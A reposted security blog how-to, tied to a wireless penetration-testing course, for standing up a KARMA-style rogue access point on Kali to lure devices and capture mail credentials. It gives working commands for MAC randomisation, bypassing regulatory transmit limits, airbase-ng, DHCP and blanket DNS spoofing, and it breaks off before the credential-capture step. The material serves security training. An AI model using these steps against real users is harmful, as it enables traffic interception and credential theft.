PostHole
Compose Login
You are browsing eu.zone1 in read-only mode. Log in to participate.
rss-bridge 2013-07-12T12:44:29+00:00

Rogue Access Points, a how-to

In preparation for our wireless training course at BlackHat Vegas in a few weeks, I spent some time updating the content on rogue/spoofed access points. What we mean by this are access points under your control, that you attempt to trick a user into connecting to, rather than the “unauthorised access points” Bob in Marketing bought and plugged into your internal network for his team to use.
I’ll discuss how to quickly get a rogue AP up on Kali that will allow you to start gathering some creds, specifically mail creds. Once you have that basic pattern down, setting up more complex attacks is fairly easy.

In preparation for our wireless training course at BlackHat Vegas in a few weeks, I spent some time updating the content on rogue/spoofed access points. What we mean by this are access points under your control, that you attempt to trick a user into connecting to, rather than the “unauthorised access points” Bob in Marketing bought and plugged into your internal network for his team to use.

I’ll discuss how to quickly get a rogue AP up on Kali that will allow you to start gathering some creds, specifically mail creds. Once you have that basic pattern down, setting up more complex attacks is fairly easy.

This is a fairly detailed “how-to” style blog entry that gives you a taste of what you can grab on our training course.

Preparation

First up, you’ll need a wireless card that supports injection. The aircrack forums maintain a list. I’m using the Alfa AWUS036H. Students on our course each get one of these to keep. We buy them from Rokland who always give us great service.

Second, you’ll need a laptop running Kali. The instructions here are pretty much the same for BackTrack (deprecated, use Kali).

For this setup, you won’t need upstream internet connectivity. In many ways setting up a “mitm” style rogue AP is much easier, but it requires that you have upstream connectivity which means you have to figure out an upstream connection (if you want to be mobile this means buying data from a mobile provider) and prevents you from using your rogue in funny places like aeroplanes or data centres. We’re going to keep things simple.

Finally, you’ll need to install some packages, I’ll discuss those as we set each thing up.

Overview

We’re going to string a couple of things together here:

Access Point  <-> routing & firewalling <-> DHCP <-> spoof services (DNS & mail)

There are several ways you can do each of these depending on preference and equipment. I’ll cover some alternatives, but here I’m going for quick and simple.

Access Point

Ideally, you should have a fancy wifi card with a Prism chipset that you can put into master mode, and have (digininja’s karma patched) hostapd play nicely with. But, we don’t have one of those, and will be using airbase-ng’s soft ap capability. You won’t get an AP that scales particularly well, or has decent throughput, or even guarantees that people can associate, but it’s often good enough.

For this section, we’ll use a few tools:

  • airbase-ng (via the aircrack-ng suite)
  • macchanger
  • iw

You can install these with: apt-get install aircrack-ng macchanger iw

First, let’s practise some good opsec and randomise our MAC address, then, while we’re at it, push up our transmit power. Assuming our wifi card has shown up as the device wlan0 (you can check with airmon-ng), we’ll run:

ifconfig wlan0 down

macchanger -r wlan0 #randomise our MAC

iw reg set BO #change our regulatory domain to something more permissive

ifconfig wlan0 up

iwconfig wlan0 txpower 30 #1Watt transmit power

Right, now we can set up the AP using airbase. We have some options, with the biggest being whether you go for a KARMA style attack, or a point-network spoof.

airmon-ng start wlan0 #Put our card into monitor mode

airbase-ng -c6 -P -C20 -y -v mon0& #Set up our soft AP in karma mode

#airbase-ng -c6 -e "Internet" -v mon0& #Alternatively, set up our soft AP for 1 net (no karma)

Airbase has a couple of different ways to work. I’ll explain the parameters:

  • -c channel, check which channel is the least occupied with airodump
  • -P (karma mode) respond to all probes i.e. if a victim’s device is usually connects to the open network “Internet” it will probe to see if that network is nearby. Our AP will see the probe and helpfully respond. The device, not knowing that this isn’t an ESS for the Internet network, will join our AP.
  • -y don’t respond to broadcast probes, aka the “is there anyone out there” shout of wifi. This helps in busy areas to reduce the AP’s workload
  • -C20 after a probed for network has been seen, send beacons with that network name out for 20 seconds afterwards. If you’re having trouble connecting, increasing this can help, but not much
  • -v be verbose
  • -e “Internet” pretend to be a specific fake ESSID. Using airodump and monitoring for probed networks from your victim, and just pretending to be that network (i.e. drop -P and -y) can increase reliability for specific targets.

If you’re putting this into a script, make sure to background the airbase process (the &). At this point, you should have an AP up and running.

Routing & IP Time

There are lots of options here, you could bridge the AP and your upstream interface, you could NAT (NB you can’t NAT from wifi to wifi). We’re not using an upstream connection, so things are somewhat simpler, we’re just going to give our AP an IP and add a route for it’s network. It’s all standard unix tools here.

The basics:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

echo '1' > /proc/sys/net/ipv4/ip_forward

This is good enough for our no upstream AP, but if you wanted to use an upstream bridge, you could use the following alternates:

apt-get install bridge-utils #To get the brctl tool, only run this once

brctl addbr br0

brctl addif br0 eth0 #Assuming eth0 is your upstream interface

brctl addif br0 at0

ifconfig br0 up

If you wanted to NAT, you could use:

iptables --policy INPUT ACCEPT #Good housekeeping, clean the tables first

iptables --policy OUTPUT ACCEPT #Don't want to clear rules with a default DENY

iptables --policy FORWARD ACCEPT

iptables -t nat -F

iptables -F

#The actual NAT stuff

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -A FORWARD -i at0 -o eth0 -j ACCEPT

Legitimate Services

We need to have a fully functioning network, which requires some legitimate services. For our purposes, we only really need one, DHCP. Metasploit does have a dhcpd service, but it seems to have a few bugs. I’d recommend using the standard isc-dhcp-server in Kali which is rock solid.

apt-get install isc-dhcp-server #Only run this once

cat >> dhcpd.conf #We need to write the dhcp config file

authoritative;

subnet 10.0.0.0 netmask 255.255.255.0 {

range 10.0.0.100 10.0.0.254;

option routers 10.0.0.1;

option domain-name-servers 10.0.0.1;

}^D #If you chose this method of writing the file, hit Ctrl-D

dhcpd -cf dhcpd.conf

Evil Services

We’re going to cover three evil services here:

  • DNS spoofing
  • Captive portal detection avoidance
  • Mail credential interception services

DNS spoofing

Once again, there are a couple of ways you can do DNS spoofing. The easiest is to use Dug Song’s dnsspoof. An alternative would be to use metasploit’s fakedns, but I find that makes the metasploit output rather noisy. Since there’s no upstream, we’ll just spoof all DNS queries to point back to us.

apt-get install dsniff #Only run the first time :)

cat >> dns.txt

10.0.0.1 *

^D #As in hit Ctrl-C

dnsspoof -i at0 -f dns.txt& #Remember to background it if in a script

Captive Portal Detection Avoidance

[...]

Original source

Reply